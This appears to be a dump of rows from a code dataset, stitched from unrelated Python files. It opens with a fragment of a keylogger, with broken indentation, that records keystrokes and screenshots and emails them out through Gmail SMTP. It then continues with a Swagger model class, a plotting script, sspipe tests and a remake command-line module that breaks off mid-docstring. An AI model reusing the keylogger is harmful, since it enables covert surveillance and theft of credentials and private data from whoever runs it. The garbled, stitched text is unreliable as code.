        print("{0} pressed".format(key))
        if count >= 10:
            count = 0
            write_file(keys)
            keys = []
#Special characters are included here.
def write_file(keys):
with open("Log.txt", "a") as f: #Saves the Logging data
for key in keys:
k = str(key).replace("'","")
if k.find("space") > 0:
f.write(str(' '))
elif k.find("caps_lock") > 0:
f.write(str("<CAPS_LOCK>"))
elif k.find("enter") > 0:
f.write(str("\n"))
elif k.find("<96>") > -1:
f.write(str("0"))
elif k.find("<97>") > -1:
f.write(str("1"))
elif k.find("<98>") > -1:
f.write(str("2"))
elif k.find("<99>") > -1:
f.write(str("3"))
elif k.find("<100>") > -1:
f.write(str("4"))
elif k.find("<101>") > -1:
f.write(str("5"))
elif k.find("<102>") > -1:
f.write(str("6"))
elif k.find("<103>") > -1:
f.write(str("7"))
elif k.find("<104>") > -1:
f.write(str("8"))
elif k.find("<105>") > -1:
f.write(str("9"))
elif k.find("Key") == -1:
f.write(k)
    def on_release(key):
        """pynput callback: returning False on Esc stops the listener."""
        if key == Key.esc:
            return False
    def save_screenshot():
        """Capture the screen and save it as Evidence.png in the working directory."""
        myScreenshot = pyautogui.screenshot()
        myScreenshot.save(r'Evidence.png') #Saves a Screenshot
#Check if it works
    def send_emal():
        """Email Log.txt and Evidence.png to the configured recipients via Gmail."""
        receiver_emails = ['from_recipient@outlook.com'] #Enter the email where you want to be sent the keylog data
        subject = "Keylog Data" + datetime.now().strftime("%d-%m-%Y %H-%M-%S")
        yag=yagmail.SMTP("youemail@gmail.com","you_password") #Enter the Gmail credentials used by the account that will send you the email.
        #This is the body of the email that will be sent to you
        contents = [
            ' <b> <font color="#FF1493" size="10"> LAST MINUTE PWNING 👾 </font> </b>',
            "Log.txt",
            "Evidence.png"
        ]
        yag.send(receiver_emails, subject, contents)
with Listener(on_press=on_press, on_release=on_release) as listener:
#Call Methods, Repeats every 1 minute
while True:
time.sleep(100)
save_screenshot()
send_emal()
listener.join()
except KeyboardInterrupt:
print('\n' + R + "Program Killed X_X" + W)
| 2,387 | 0 | 204 |
d70b66e55221141909a6df82d5a89e6e99db91b0 | 5,712 | py | Python | src/mbed_cloud/_backends/mds/models/endpoint.py | GQMai/mbed-cloud-sdk-python | 76ef009903415f37f69dcc5778be8f5fb14c08fe | [
"Apache-2.0"
] | 12 | 2017-12-28T11:18:43.000Z | 2020-10-04T12:11:15.000Z | src/mbed_cloud/_backends/mds/models/endpoint.py | GQMai/mbed-cloud-sdk-python | 76ef009903415f37f69dcc5778be8f5fb14c08fe | [
"Apache-2.0"
] | 50 | 2017-12-21T12:50:41.000Z | 2020-01-13T16:07:08.000Z | src/mbed_cloud/_backends/mds/models/endpoint.py | GQMai/mbed-cloud-sdk-python | 76ef009903415f37f69dcc5778be8f5fb14c08fe | [
"Apache-2.0"
] | 8 | 2018-04-25T17:47:29.000Z | 2019-08-29T06:38:27.000Z | # coding: utf-8
"""
Connect API
Pelion Device Management Connect API allows web applications to communicate with devices. You can subscribe to device resources and read/write values to them. Device Management Connect allows connectivity to devices by queueing requests and caching resource values.
OpenAPI spec version: 2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class Endpoint(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'name': 'str',
'q': 'bool',
'status': 'str',
'type': 'str'
}
attribute_map = {
'name': 'name',
'q': 'q',
'status': 'status',
'type': 'type'
}
def __init__(self, name=None, q=None, status=None, type=None):
"""
Endpoint - a model defined in Swagger
"""
self._name = name
self._q = q
self._status = status
self._type = type
self.discriminator = None
@property
def name(self):
"""
Gets the name of this Endpoint.
Unique Device Management Device ID representing the endpoint.
:return: The name of this Endpoint.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this Endpoint.
Unique Device Management Device ID representing the endpoint.
:param name: The name of this Endpoint.
:type: str
"""
self._name = name
@property
def q(self):
"""
Gets the q of this Endpoint.
Determines whether the device is in queue mode. <br/><br/><b>Queue mode</b><br/> When an endpoint is in queue mode, messages sent to the endpoint do not wake up the physical device. The messages are queued and delivered when the device wakes up and connects to Device Management Connect itself. You can also use the queue mode when the device is behind a NAT and cannot be reached directly by Device Management Connect.
:return: The q of this Endpoint.
:rtype: bool
"""
return self._q
@q.setter
def q(self, q):
"""
Sets the q of this Endpoint.
Determines whether the device is in queue mode. <br/><br/><b>Queue mode</b><br/> When an endpoint is in queue mode, messages sent to the endpoint do not wake up the physical device. The messages are queued and delivered when the device wakes up and connects to Device Management Connect itself. You can also use the queue mode when the device is behind a NAT and cannot be reached directly by Device Management Connect.
:param q: The q of this Endpoint.
:type: bool
"""
self._q = q
@property
def status(self):
"""
Gets the status of this Endpoint.
Deprecated and the value is always ACTIVE. Only used for API backwards compatibility reasons.
:return: The status of this Endpoint.
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""
Sets the status of this Endpoint.
Deprecated and the value is always ACTIVE. Only used for API backwards compatibility reasons.
:param status: The status of this Endpoint.
:type: str
"""
self._status = status
@property
def type(self):
"""
Gets the type of this Endpoint.
Type of endpoint. (Free text)
:return: The type of this Endpoint.
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""
Sets the type of this Endpoint.
Type of endpoint. (Free text)
:param type: The type of this Endpoint.
:type: str
"""
self._type = type
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, Endpoint):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 28.277228 | 428 | 0.572129 | # coding: utf-8
"""
Connect API
Pelion Device Management Connect API allows web applications to communicate with devices. You can subscribe to device resources and read/write values to them. Device Management Connect allows connectivity to devices by queueing requests and caching resource values.
OpenAPI spec version: 2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class Endpoint(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'name': 'str',
'q': 'bool',
'status': 'str',
'type': 'str'
}
attribute_map = {
'name': 'name',
'q': 'q',
'status': 'status',
'type': 'type'
}
def __init__(self, name=None, q=None, status=None, type=None):
"""
Endpoint - a model defined in Swagger
"""
self._name = name
self._q = q
self._status = status
self._type = type
self.discriminator = None
@property
def name(self):
"""
Gets the name of this Endpoint.
Unique Device Management Device ID representing the endpoint.
:return: The name of this Endpoint.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this Endpoint.
Unique Device Management Device ID representing the endpoint.
:param name: The name of this Endpoint.
:type: str
"""
self._name = name
@property
def q(self):
"""
Gets the q of this Endpoint.
Determines whether the device is in queue mode. <br/><br/><b>Queue mode</b><br/> When an endpoint is in queue mode, messages sent to the endpoint do not wake up the physical device. The messages are queued and delivered when the device wakes up and connects to Device Management Connect itself. You can also use the queue mode when the device is behind a NAT and cannot be reached directly by Device Management Connect.
:return: The q of this Endpoint.
:rtype: bool
"""
return self._q
@q.setter
def q(self, q):
"""
Sets the q of this Endpoint.
Determines whether the device is in queue mode. <br/><br/><b>Queue mode</b><br/> When an endpoint is in queue mode, messages sent to the endpoint do not wake up the physical device. The messages are queued and delivered when the device wakes up and connects to Device Management Connect itself. You can also use the queue mode when the device is behind a NAT and cannot be reached directly by Device Management Connect.
:param q: The q of this Endpoint.
:type: bool
"""
self._q = q
@property
def status(self):
"""
Gets the status of this Endpoint.
Deprecated and the value is always ACTIVE. Only used for API backwards compatibility reasons.
:return: The status of this Endpoint.
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""
Sets the status of this Endpoint.
Deprecated and the value is always ACTIVE. Only used for API backwards compatibility reasons.
:param status: The status of this Endpoint.
:type: str
"""
self._status = status
@property
def type(self):
"""
Gets the type of this Endpoint.
Type of endpoint. (Free text)
:return: The type of this Endpoint.
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""
Sets the type of this Endpoint.
Type of endpoint. (Free text)
:param type: The type of this Endpoint.
:type: str
"""
self._type = type
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, Endpoint):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 0 | 0 | 0 |
6ae1eab841865410c707419b131d26d4877665d7 | 1,377 | py | Python | scraperplot.py | TCR1990/SmartBuilding-master | fb3b373cabd442b7636b7e22c4e97853e9218d6f | [
"CC0-1.0"
] | 1 | 2020-05-18T14:14:18.000Z | 2020-05-18T14:14:18.000Z | scraperplot.py | nickmalleson/SmartBuilding-master | be644c28d920b30bf66a9fac1cf4f158a3129ab0 | [
"CC0-1.0"
] | 1 | 2020-02-04T17:26:19.000Z | 2020-02-04T17:26:19.000Z | scraperplot.py | nickmalleson/SmartBuilding-master | be644c28d920b30bf66a9fac1cf4f158a3129ab0 | [
"CC0-1.0"
] | 1 | 2020-01-20T10:01:55.000Z | 2020-01-20T10:01:55.000Z | # -*- coding: utf-8 -*-
"""
scraperplot.py
For retreiving and plotting data using the 'scraper.py' module.
Created on Wed Oct 30 15:11:00 2019
@author: Thomas Richards
"""
# import scraper.py
import scraper as scrp
# Run functions in get module
scraper = scrp.Scraper()
choices = input('What do you want to plot? Press enter for all. \n1. Managed '
'space data\n2. Sensor reading data \n>>')
if not choices:
chosen_space_numbers, chosen_space_names = \
scraper._choose_by_number(scraper.managed_space_info)
scraper.plot_managed_spaces(managed_spaces=chosen_space_numbers)
chosen_location_numbers, chosen_location_names = \
scraper._choose_by_number(scraper.sensor_location_info)
scraper.plot_sensor_reading_after(sensor_numbers=chosen_location_numbers)
elif choices:
choices = eval(choices)
if choices == 1:
chosen_space_numbers, chosen_space_names = \
scraper._choose_by_number(scraper.managed_space_info)
scraper.plot_managed_spaces(managed_spaces=chosen_space_numbers)
elif choices == 2:
chosen_location_numbers, chosen_location_names = \
scraper._choose_by_number(scraper.sensor_location_info)
scraper.plot_sensor_reading_after(sensor_numbers=\
chosen_location_numbers)
else:
print('Unknown input.') | 30.6 | 78 | 0.716776 | # -*- coding: utf-8 -*-
"""
scraperplot.py
For retreiving and plotting data using the 'scraper.py' module.
Created on Wed Oct 30 15:11:00 2019
@author: Thomas Richards
"""
# import scraper.py
import scraper as scrp
# Run functions in get module
scraper = scrp.Scraper()
choices = input('What do you want to plot? Press enter for all. \n1. Managed '
'space data\n2. Sensor reading data \n>>')
if not choices:
    # Empty input: plot everything (managed spaces and sensor readings).
    chosen_space_numbers, chosen_space_names = \
        scraper._choose_by_number(scraper.managed_space_info)
    scraper.plot_managed_spaces(managed_spaces=chosen_space_numbers)
    chosen_location_numbers, chosen_location_names = \
        scraper._choose_by_number(scraper.sensor_location_info)
    scraper.plot_sensor_reading_after(sensor_numbers=chosen_location_numbers)
elif choices:
    # Parse the menu choice safely: eval() on raw user input can execute
    # arbitrary code and raises on non-numeric input.
    try:
        choices = int(choices)
    except ValueError:
        choices = None  # falls through to the 'Unknown input.' branch below
    if choices == 1:
        chosen_space_numbers, chosen_space_names = \
            scraper._choose_by_number(scraper.managed_space_info)
        scraper.plot_managed_spaces(managed_spaces=chosen_space_numbers)
    elif choices == 2:
        chosen_location_numbers, chosen_location_names = \
            scraper._choose_by_number(scraper.sensor_location_info)
        scraper.plot_sensor_reading_after(
            sensor_numbers=chosen_location_numbers)
else:
print('Unknown input.') | 0 | 0 | 0 |
7011b2ae0614609670b4e97d7fc81ec2fb09c3bb | 455 | py | Python | tests/test_numpy.py | python-pipe/hellp | 51fd7c9143ee8ce6392b9b877036ad4347ad29a5 | [
"MIT"
] | 123 | 2018-07-31T19:17:27.000Z | 2022-03-18T15:29:07.000Z | tests/test_numpy.py | python-pipe/hellp | 51fd7c9143ee8ce6392b9b877036ad4347ad29a5 | [
"MIT"
] | 11 | 2019-05-01T18:01:59.000Z | 2022-01-01T06:43:36.000Z | tests/test_numpy.py | python-pipe/hellp | 51fd7c9143ee8ce6392b9b877036ad4347ad29a5 | [
"MIT"
] | 4 | 2019-06-07T12:03:53.000Z | 2021-05-10T20:29:44.000Z | from sspipe import p, px
import numpy as np
| 16.851852 | 62 | 0.558242 | from sspipe import p, px
import numpy as np
def test_scalar_rhs():
    """Pipe a numpy scalar through a lambda stage, then compare via px."""
    assert np.int32(1) | p(lambda x: x + 1) | (px == 2)
def test_scalar_lhs():
    """Plain int piped into a px stage that adds a numpy scalar."""
    assert 2 | px + np.int32(1)
def test_rhs():
    """numpy array piped into a reducing lambda stage."""
    assert np.array([1, 2]) | p(lambda x: x.sum()) | (px == 3)
def test_rhs_px():
    """Same reduction expressed directly on the px placeholder."""
    assert np.array([1, 2]) | (px.sum() == 3)
def test_lhs():
    """numpy ufunc used as a pipe stage via p()."""
    assert 2 | p(np.log2) | (px == 1)
def test_lhs_px():
    """px appearing twice inside one numpy call: 2 ** (2 + 1) == 8."""
    assert 2 | np.power(px, px + 1) | (px == 8)
| 267 | 0 | 138 |
c60241305672e3e339af5d324f08b5f8a9314443 | 20,971 | py | Python | remake/remake_cmd.py | markmuetz/remake | a3c5098be57b60b01ffaa4a7fcb937f9337dcdea | [
"Apache-2.0"
] | null | null | null | remake/remake_cmd.py | markmuetz/remake | a3c5098be57b60b01ffaa4a7fcb937f9337dcdea | [
"Apache-2.0"
] | 35 | 2020-12-22T11:36:46.000Z | 2021-12-03T15:49:41.000Z | remake/remake_cmd.py | markmuetz/remake | a3c5098be57b60b01ffaa4a7fcb937f9337dcdea | [
"Apache-2.0"
] | null | null | null | import os
import sys
import argparse
import shutil
from logging import getLogger
from pathlib import Path
from time import sleep
from typing import List, Union, Optional, Sequence, Text
try:
# Might not be installed.
import ipdb as debug
except ImportError:
import pdb as debug
try:
import argcomplete
except ImportError:
argcomplete = None
from tabulate import tabulate
from remake.setup_logging import setup_stdout_logging
from remake.version import get_version
from remake.loader import load_remake
from remake.remake_exceptions import RemakeError
from remake.bcolors import bcolors
from remake.monitor import remake_curses_monitor
logger = getLogger(__name__)
| 35.725724 | 100 | 0.564351 | import os
import sys
import argparse
import shutil
from logging import getLogger
from pathlib import Path
from time import sleep
from typing import List, Union, Optional, Sequence, Text
try:
# Might not be installed.
import ipdb as debug
except ImportError:
import pdb as debug
try:
import argcomplete
except ImportError:
argcomplete = None
from tabulate import tabulate
from remake.setup_logging import setup_stdout_logging
from remake.version import get_version
from remake.loader import load_remake
from remake.remake_exceptions import RemakeError
from remake.bcolors import bcolors
from remake.monitor import remake_curses_monitor
logger = getLogger(__name__)
def log_error(ex_type, value, tb):
    """sys.excepthook replacement: log known RemakeErrors tersely,
    print a full traceback for anything else."""
    if not isinstance(value, RemakeError):
        import traceback
        traceback.print_exception(ex_type, value, tb)
        return
    logger.error(value)
def exception_info(ex_type, value, tb):
    """sys.excepthook replacement for --debug-exception: print the full
    traceback, then start a post-mortem session in ipdb/pdb (``debug.pm()``)."""
    import traceback
    traceback.print_exception(ex_type, value, tb)
    debug.pm()
class Arg:
    """Bundles the positional/keyword arguments for a deferred
    ``parser.add_argument`` call (see ``add_argset``)."""

    def __init__(self, *args, **kwargs):
        self.args = args
        self.kwargs = kwargs

    def __call__(self):
        # Hand back the stored (args, kwargs) pair.
        return self.args, self.kwargs

    def __repr__(self):
        return str(self)

    def __str__(self):
        return 'Arg({}, {})'.format(self.args, self.kwargs)
class MutuallyExclusiveGroup:
    """Groups Arg declarations that argparse must register as a
    mutually exclusive group (see ``add_argset``)."""

    def __init__(self, *args):
        self.args = args

    def __repr__(self):
        return str(self)

    def __str__(self):
        members = [str(arg) for arg in self.args]
        return 'MutuallyExclusiveGroup(\n    {})'.format('\n    '.join(members))
def add_argset(parser, argset):
    """Register an Arg or MutuallyExclusiveGroup on an argparse parser."""
    if isinstance(argset, Arg):
        parser.add_argument(*argset.args, **argset.kwargs)
        return
    if isinstance(argset, MutuallyExclusiveGroup):
        group = parser.add_mutually_exclusive_group()
        for arg in argset.args:
            group.add_argument(*arg.args, **arg.kwargs)
        return
    raise Exception(f'Unrecognized argset type {argset}')
class RemakeParser:
    """Builds the ``remake`` argparse CLI and dispatches parsed sub-commands.

    The declarative class attributes (``args``, ``*_group``, ``sub_cmds``)
    describe the entire command-line interface; ``_build_parser`` turns them
    into an ``argparse.ArgumentParser`` and ``dispatch`` routes the parsed
    namespace to the module-level command functions (``remake_run`` etc.).
    """
    # Global flags available before any sub-command.
    args = [
        MutuallyExclusiveGroup(
            Arg('--debug', '-D', help='Enable debug logging', action='store_true'),
            Arg('--info', '-I', help='Enable info logging', action='store_true'),
            Arg('--warning', '-W', help='Warning logging only', action='store_true'),
        ),
        Arg('--debug-exception', '-X', help=f'Launch {debug.__name__} on exception',
            action='store_true'),
        Arg('--no-colour', '-B', help='Black and white logging', action='store_true'),
    ]
    # Flags controlling how tasks are executed (shared by run/run-tasks).
    run_ctrl_group = [
        Arg('--force', '-f', action='store_true'),
        Arg('--reasons', '-r', action='store_true'),
        Arg('--executor', '-E', default='singleproc'),
        Arg('--display', '-d', choices=['print_status', 'task_dag']),
    ]
    # Flags selecting a subset of tasks (shared by run-tasks/ls-tasks).
    task_filter_group = [
        Arg('--filter'),
        Arg('--rule'),
        Arg('--requires-rerun', '-R', action='store_true'),
        Arg('--uses-file', '-U'),
        Arg('--produces-file', '-P'),
        Arg('--ancestor-of', '-A', help='includes requested task'),
        Arg('--descendant-of', '-D', help='includes requested task'),
    ]
    # Flags selecting a subset of files (shared by ls-files/rm-files).
    ls_files_group = [
        MutuallyExclusiveGroup(
            Arg('--input', action='store_true'),
            Arg('--output', action='store_true'),
            Arg('--input-only', action='store_true'),
            Arg('--output-only', action='store_true'),
            Arg('--inout', action='store_true'),
        ),
        Arg('--produced-by-rule'),
        Arg('--used-by-rule'),
        Arg('--produced-by-task'),
        Arg('--used-by-task'),
    ]
    # Sub-command name -> {'help': ..., 'args': [...]} used by _build_parser.
    sub_cmds = {
        'run': {
            'help': 'Run all pending tasks',
            'args': [
                Arg('remakefile', nargs='?', default='remakefile'),
                Arg('--rescan-only', action='store_true', help='only rescan input files'),
                Arg('--one', '-o', action='store_true', help='run one pending task'),
                Arg('--random', action='store_true', help='run one (lucky dip!)'),
                *run_ctrl_group,
            ],
        },
        'run-tasks': {
            'help': 'Run specified tasks (uses same flags as ls-tasks)',
            'args': [
                Arg('remakefile', nargs='?', default='remakefile'),
                Arg('--tasks', '-t', nargs='*'),
                Arg('--handle-dependencies', '-H', action='store_true'),
                *run_ctrl_group,
                *task_filter_group,
            ]
        },
        'ls-rules': {
            'help': 'List rules',
            'args': [
                Arg('remakefile', nargs='?', default='remakefile'),
                Arg('--long', '-l', action='store_true'),
                Arg('--filter', '-F', default=None),
                Arg('--uses-file', '-U'),
                Arg('--produces-file', '-P'),
            ]
        },
        'ls-tasks': {
            'help': 'List tasks',
            'args': [
                Arg('remakefile', nargs='?', default='remakefile'),
                Arg('--long', '-l', action='store_true'),
                *task_filter_group,
            ]
        },
        'ls-files': {
            'help': 'Remove files',
            'args': [
                Arg('remakefile', nargs='?', default='remakefile'),
                Arg('--long', '-l', action='store_true'),
                *ls_files_group,
                Arg('--exists', action='store_true'),
            ]
        },
        'rm-files': {
            'help': 'Remove files',
            'args': [
                Arg('remakefile', nargs='?', default='remakefile'),
                Arg('--force', '-f', action='store_true'),
                *ls_files_group,
            ]
        },
        'info': {
            'help': 'Information about remakefile status',
            'args': [
                Arg('remakefile', nargs='?', default='remakefile'),
                MutuallyExclusiveGroup(
                    Arg('--short', '-s', action='store_true'),
                    Arg('--long', '-l', action='store_true'),
                ),
                Arg('--display', '-d', choices=['print_status', 'task_dag'],
                    default='print_status'),
            ]
        },
        'rule-info': {
            'help': 'Information about rule',
            'args': [
                Arg('remakefile', nargs='?', default='remakefile'),
                Arg('--long', '-l', action='store_true'),
                Arg('rules', nargs='*'),
            ]
        },
        'task-info': {
            'help': 'Information about task',
            'args': [
                Arg('remakefile', nargs='?', default='remakefile'),
                Arg('--long', '-l', action='store_true'),
                Arg('tasks', nargs='*'),
            ]
        },
        'file-info': {
            'help': 'Information about file',
            'args': [
                Arg('--long', '-l', action='store_true'),
                Arg('remakefile', nargs='?', default='remakefile'),
                Arg('filenames', nargs='*'),
            ]
        },
        'monitor': {
            'help': 'Monitor remake (polls remake metadata dir)',
            'args': [
                Arg('--timeout', '-t', help='timeout (s) to use for polling', default=10,
                    type=float),
                Arg('remakefile', nargs='?', default='remakefile'),
            ]
        },
        'setup-examples': {
            'help': 'Setup examples directory',
            'args': [
                Arg('--force', '-f', action='store_true'),
            ]
        },
        'version': {
            'help': 'Print remake version',
            'args': [
                Arg('--long', '-l', action='store_true', help='long version'),
            ]
        },
    }
    def __init__(self):
        """Build the parser. NOTE: the instance attribute ``self.args``
        (parsed namespace, set by parse_args) shadows the class-level
        ``args`` declaration list."""
        self.args = None
        self.parser = self._build_parser()
    def _build_parser(self):
        """Construct the ArgumentParser from the declarative class attributes."""
        parser = argparse.ArgumentParser(description='remake command line tool')
        # Capitalize the auto-generated '-h' help text (private argparse API).
        parser._actions[0].help = 'Show this help message and exit'
        for argset in RemakeParser.args:
            add_argset(parser, argset)
        subparsers = parser.add_subparsers(dest='subcmd_name')
        for cmd_key, cmd_kwargs in RemakeParser.sub_cmds.items():
            args = cmd_kwargs['args']
            subparser = subparsers.add_parser(cmd_key, help=cmd_kwargs['help'])
            for argset in args:
                add_argset(subparser, argset)
        if argcomplete:
            # Optional dependency: enable shell tab-completion when available.
            argcomplete.autocomplete(parser)
        return parser
    def parse_args(self, argv: Optional[Sequence[Text]] = ...) -> argparse.Namespace:
        """Parse ``argv`` (including the program name at index 0) and store
        the result on ``self.args``.

        NOTE(review): the ``...`` (Ellipsis) default would fail if the method
        were ever called without ``argv`` -- callers always pass it; confirm
        whether ``None``/``sys.argv`` was intended.
        """
        self.args = self.parser.parse_args(argv[1:])
        return self.args
    def dispatch(self):
        """Route the parsed namespace to the matching module-level command
        function. Must be called after parse_args."""
        args = self.args
        # Dispatch command.
        # N.B. args should always be dereferenced at this point,
        # not passed into any subsequent functions.
        if args.subcmd_name == 'run':
            remake_run(args.remakefile, args.rescan_only, args.force, args.one, args.random,
                       args.reasons, args.executor, args.display)
        elif args.subcmd_name == 'run-tasks':
            remake_run_tasks(args.remakefile, args.tasks, args.handle_dependencies, args.force,
                             args.reasons, args.executor, args.display,
                             args.filter, args.rule,
                             args.requires_rerun, args.uses_file, args.produces_file,
                             args.ancestor_of, args.descendant_of)
        elif args.subcmd_name == 'ls-rules':
            ls_rules(args.remakefile, args.long, args.filter, args.uses_file, args.produces_file)
        elif args.subcmd_name == 'ls-tasks':
            ls_tasks(args.remakefile, args.long,
                     args.filter, args.rule,
                     args.requires_rerun, args.uses_file,
                     args.produces_file, args.ancestor_of, args.descendant_of)
        elif args.subcmd_name in ['ls-files', 'rm-files']:
            # Collapse the mutually exclusive file-type flags to one string.
            if args.input:
                filetype = 'input'
            elif args.output:
                filetype = 'output'
            elif args.input_only:
                filetype = 'input_only'
            elif args.output_only:
                filetype = 'output_only'
            elif args.inout:
                filetype = 'inout'
            else:
                filetype = None
            if args.subcmd_name == 'ls-files':
                ls_files(args.remakefile, args.long, filetype, args.exists,
                         args.produced_by_rule, args.used_by_rule,
                         args.produced_by_task, args.used_by_task)
            else:
                rm_files(args.remakefile, args.force, filetype,
                         args.produced_by_rule, args.used_by_rule,
                         args.produced_by_task, args.used_by_task)
        elif args.subcmd_name == 'info':
            remakefile_info(args.remakefile, args.short, args.long, args.display)
        elif args.subcmd_name == 'rule-info':
            rule_info(args.remakefile, args.long, args.rules)
        elif args.subcmd_name == 'task-info':
            task_info(args.remakefile, args.long, args.tasks)
        elif args.subcmd_name == 'file-info':
            file_info(args.remakefile, args.filenames)
        elif args.subcmd_name == 'monitor':
            monitor(args.remakefile, args.timeout)
        elif args.subcmd_name == 'setup-examples':
            setup_examples(args.force)
        elif args.subcmd_name == 'version':
            print(get_version(form='long' if args.long else 'short'))
        else:
            assert False, f'Subcommand {args.subcmd_name} not recognized'
def _get_argparse_parser():
    """Return the bare ArgumentParser from a fresh RemakeParser instance
    (module-level helper; presumably for external doc/completion tooling --
    TODO confirm callers)."""
    parser = RemakeParser()
    return parser.parser
def remake_cmd(argv: Union[List[str], None] = None) -> Optional[int]:
    """Entry point for the ``remake`` command line tool.

    Parses ``argv`` (defaults to ``sys.argv``; element 0 is the program name),
    installs the excepthook, configures stdout logging, then dispatches to the
    chosen sub-command. Returns 1 (after printing help) when no sub-command is
    given, otherwise None.
    """
    if argv is None:
        argv = sys.argv
    parser = RemakeParser()
    args = parser.parse_args(argv)
    if not args.subcmd_name:
        parser.parser.print_help()
        return 1
    if args.debug_exception:
        # Handle top level exceptions with a debugger.
        sys.excepthook = exception_info
    else:
        sys.excepthook = log_error
    # REMAKE_LOGLEVEL env var takes precedence over the -D/-I/-W flags.
    loglevel = os.getenv('REMAKE_LOGLEVEL', None)
    if loglevel is None:
        if args.debug:
            loglevel = 'DEBUG'
        elif args.info:
            loglevel = 'INFO'
        elif args.warning:
            loglevel = 'WARNING'
        else:
            # Do not output full info logging for -info commands. (Ironic?)
            # Do not output full info logging for ls- commands.
            if args.subcmd_name.endswith('-info') or args.subcmd_name.startswith('ls-'):
                loglevel = 'WARNING'
            else:
                loglevel = 'INFO'
    colour = not args.no_colour
    # The monitor sub-command owns the terminal via curses -- no stdout logging.
    if args.subcmd_name != 'monitor':
        setup_stdout_logging(loglevel, colour=colour)
    parser.dispatch()
def remake_run(remakefile, rescan_only, force, one, random, print_reasons, executor, display):
    """Implement the ``run`` sub-command: run pending tasks in the remakefile.

    ``rescan_only`` only rescans input files; ``one``/``random`` run a single
    task; otherwise all tasks are run (``force`` reruns regardless of status).
    ``force`` cannot be combined with ``one`` or ``random``.
    """
    if force and (one or random):
        raise ValueError('--force cannot be used with --one or --random')
    remake = load_remake(remakefile).finalize()
    remake.configure(print_reasons, executor, display)
    remake.short_status()
    if rescan_only:
        remake.task_ctrl.run_rescan_only()
    elif one:
        remake.run_one()
    elif random:
        remake.run_random()
    else:
        remake.run_all(force=force)
    if display == 'task_dag':
        # Give user time to see final task_dag state.
        sleep(3)
    remake.short_status()
def remake_run_tasks(remakefile, task_path_hash_keys, handle_dependencies,
                     force, print_reasons, executor, display,
                     tfilter, rule,
                     requires_rerun, uses_file, produces_file,
                     ancestor_of, descendant_of):
    """Implement the ``run-tasks`` sub-command: run an explicit task selection.

    Tasks are selected either by ``task_path_hash_keys`` (from --tasks) or by
    the filter arguments (--filter/--rule etc.) -- the two are exclusive.
    ``tfilter`` is a 'k1=v1,k2=v2' string parsed into a dict.
    """
    remake = load_remake(remakefile).finalize()
    remake.configure(print_reasons, executor, display)
    remake.short_status()
    if task_path_hash_keys and (tfilter or rule):
        raise RemakeError('Can only use one of --tasks and (--filter or --rule)')
    if task_path_hash_keys:
        tasks = remake.find_tasks(task_path_hash_keys)
    else:
        if tfilter:
            tfilter = dict([kv.split('=') for kv in tfilter.split(',')])
        tasks = remake.list_tasks(tfilter, rule, requires_rerun, uses_file,
                                  produces_file, ancestor_of, descendant_of)
    remake.run_requested(tasks, force=force, handle_dependencies=handle_dependencies)
    if display == 'task_dag':
        # Give user time to see final task_dag state.
        sleep(3)
    remake.short_status()
def ls_rules(remakefile, long, tfilter, uses_file, produces_file):
    """Implement the ``ls-rules`` sub-command: print one rule name per line.

    NOTE(review): ``long``, ``tfilter``, ``uses_file`` and ``produces_file``
    are accepted but currently ignored (see TODO below).
    """
    # TODO: implement all args.
    remake = load_remake(remakefile)
    rules = remake.list_rules()
    for rule in rules:
        print(f'{rule.__name__}')
def ls_tasks(remakefile, long, tfilter, rule, requires_rerun, uses_file, produces_file,
             ancestor_of, descendant_of):
    """Implement the ``ls-tasks`` sub-command: print the filtered task list.

    ``tfilter`` is a 'k1=v1,k2=v2' string parsed into a dict before filtering.
    """
    remake = load_remake(remakefile).finalize()
    if tfilter:
        tfilter = dict([kv.split('=') for kv in tfilter.split(',')])
    tasks = remake.list_tasks(tfilter, rule, requires_rerun, uses_file,
                              produces_file, ancestor_of, descendant_of)
    tasks.status(long, long)
def ls_files(remakefile, long, filetype, exists,
             produced_by_rule, used_by_rule, produced_by_task, used_by_task):
    """Implement the ``ls-files`` sub-command: print matching files,
